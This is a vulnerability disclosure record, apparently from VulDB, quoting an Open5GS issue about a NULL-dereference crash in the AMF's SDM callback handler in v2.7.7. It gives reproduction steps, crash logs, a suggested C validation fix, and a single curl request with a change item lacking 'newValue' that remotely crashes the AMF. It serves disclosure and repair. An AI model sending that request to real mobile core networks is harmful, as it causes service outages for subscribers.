Submission #804023: Open5GS AMF v2.7.7 Denial of Service
Information

Title: Open5GS AMF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

AMF crashes when it receives `POST /namf-callback/v1/{anything}/sdmsubscription-notify` with a `ModificationNotification` whose `changeItem` omits `newValue`. The `ChangeItem` parser accepts a missing `newValue`, but `amf_namf_callback_handle_sdm_data_change_notify()` later calls `update_ambr()`, which unconditionally dereferences `item_change->new_value->json`. This makes the callback route remotely crashable with a single HTTP request.

### Steps to reproduce

1. Start the official Open5GS v2.7.7 Docker deployment.
2. Register a real UE so that the callback can reference a valid SUPI. In my live setup I used the existing MongoDB subscriber:

   ```text
   IMSI: 001011234567891
   K: 00000000000000000000000000000000
   OPC: 00000000000000000000000000000000
   AMF: 8000
   DNN: internet
   S-NSSAI: SST=1, SD=1
   ```

3. Bring up a UERANSIM gNB and UE on the same Docker network and wait until the UE is fully registered. In my live setup the AMF log showed:

   ```text
   [imsi-001011234567891] Registration complete
   ```

4. Send the following HTTP/2 callback request to the AMF SBI endpoint (`http://10.33.33.9:80` in my live setup):

   ```bash
   curl --http2-prior-knowledge -m 5 -sS -i \
     -X POST http://10.33.33.9/namf-callback/v1/x/sdmsubscription-notify \
     -H 'content-type: application/json' \
     --data '{"notifyItems":[{"resourceId":"imsi-001011234567891/am-data","changes":[{"op":"REMOVE","path":"/foo"}]}]}'
   ```

5. Check the AMF container state and logs:

   ```bash
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
   docker logs --tail 80 amf
   ```

### Logs

```text
04/10 15:51:47.137: [gmm] INFO: [imsi-001011234567891] Registration complete
/usr/local/bin/entrypoint.sh: line 10: 8 Segmentation fault (core dumped) open5gs-amfd "${@}"
```

### Expected behaviour

AMF should reject the malformed callback with a normal HTTP error such as `400 Bad Request`, and the AMF process should remain running.

### Observed Behaviour

The HTTP/2 stream terminates abnormally, no proper error response is returned, and the AMF process exits with code `139` due to a segmentation fault.

### eNodeB/gNodeB

UERANSIM gNB v3.2.7

### UE Models and versions

UERANSIM UE v3.2.7
Source: https://github.com/open5gs/open5gs/issues/4395
User: ZiyuLin (UID 93568)
Submission: 14.04.2026 04:01 (2 months ago)
Moderation: 30.04.2026 18:26 (17 days later)
Status: accepted
VulDB entry: 360332 [Open5GS up to 2.7.7 AMF SBI Endpoint sdmsubscription-notify amf_namf_callback_handle_sdm_data_change_notify changeItem.newValue denial of service]
Points: 20
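
The C sketch below is an added example, not code from Open5GS or from the report: it shows the validate-before-use pattern that the expected behaviour asks for, rejecting a change item without `newValue` with a 400 before anything dereferences it, and checking all items first so a bad item cannot leave a partial update. The struct types, `handle_sdm_change()`, the sample path and values, and the 204 success status are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Simplified stand-ins for a parsed ChangeItem (assumed, not Open5GS types). */
typedef struct { const char *json; } any_value_t;
typedef struct {
    const char *op;          /* "ADD", "REPLACE", "REMOVE", ... */
    const char *path;
    any_value_t *new_value;  /* NULL when the request omitted "newValue" */
} change_item_t;

/* Hypothetical per-UE state that the handler updates from the new value. */
typedef struct { const char *ambr_json; int updates; } ue_ctx_t;

/* Usable only if every pointer the updater reads is non-NULL. */
static int change_item_usable(const change_item_t *it)
{
    return it && it->op && it->path && it->new_value && it->new_value->json;
}

/* Returns the HTTP status to send: 204 if applied, 400 if rejected.
 * All items are validated before any is applied. */
int handle_sdm_change(ue_ctx_t *ue, const change_item_t *items, size_t n)
{
    size_t i;
    if (!ue || !items || n == 0)
        return 400;
    for (i = 0; i < n; i++)
        if (!change_item_usable(&items[i]))
            return 400;
    for (i = 0; i < n; i++) {
        ue->ambr_json = items[i].new_value->json;  /* safe: checked above */
        ue->updates++;
    }
    return 204;
}

int main(void)
{
    /* Constructed samples: a complete item, then one without newValue. */
    any_value_t v = { "{\"uplink\":\"1 Gbps\",\"downlink\":\"1 Gbps\"}" };
    change_item_t mixed[2] = {
        { "REPLACE", "/subscribedUeAmbr", &v },
        { "REMOVE", "/foo", NULL } };
    ue_ctx_t ue = { NULL, 0 };
    printf("complete item: %d\n", handle_sdm_change(&ue, &mixed[0], 1));
    printf("mixed batch:   %d\n", handle_sdm_change(&ue, mixed, 2));
    return 0;
}
```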
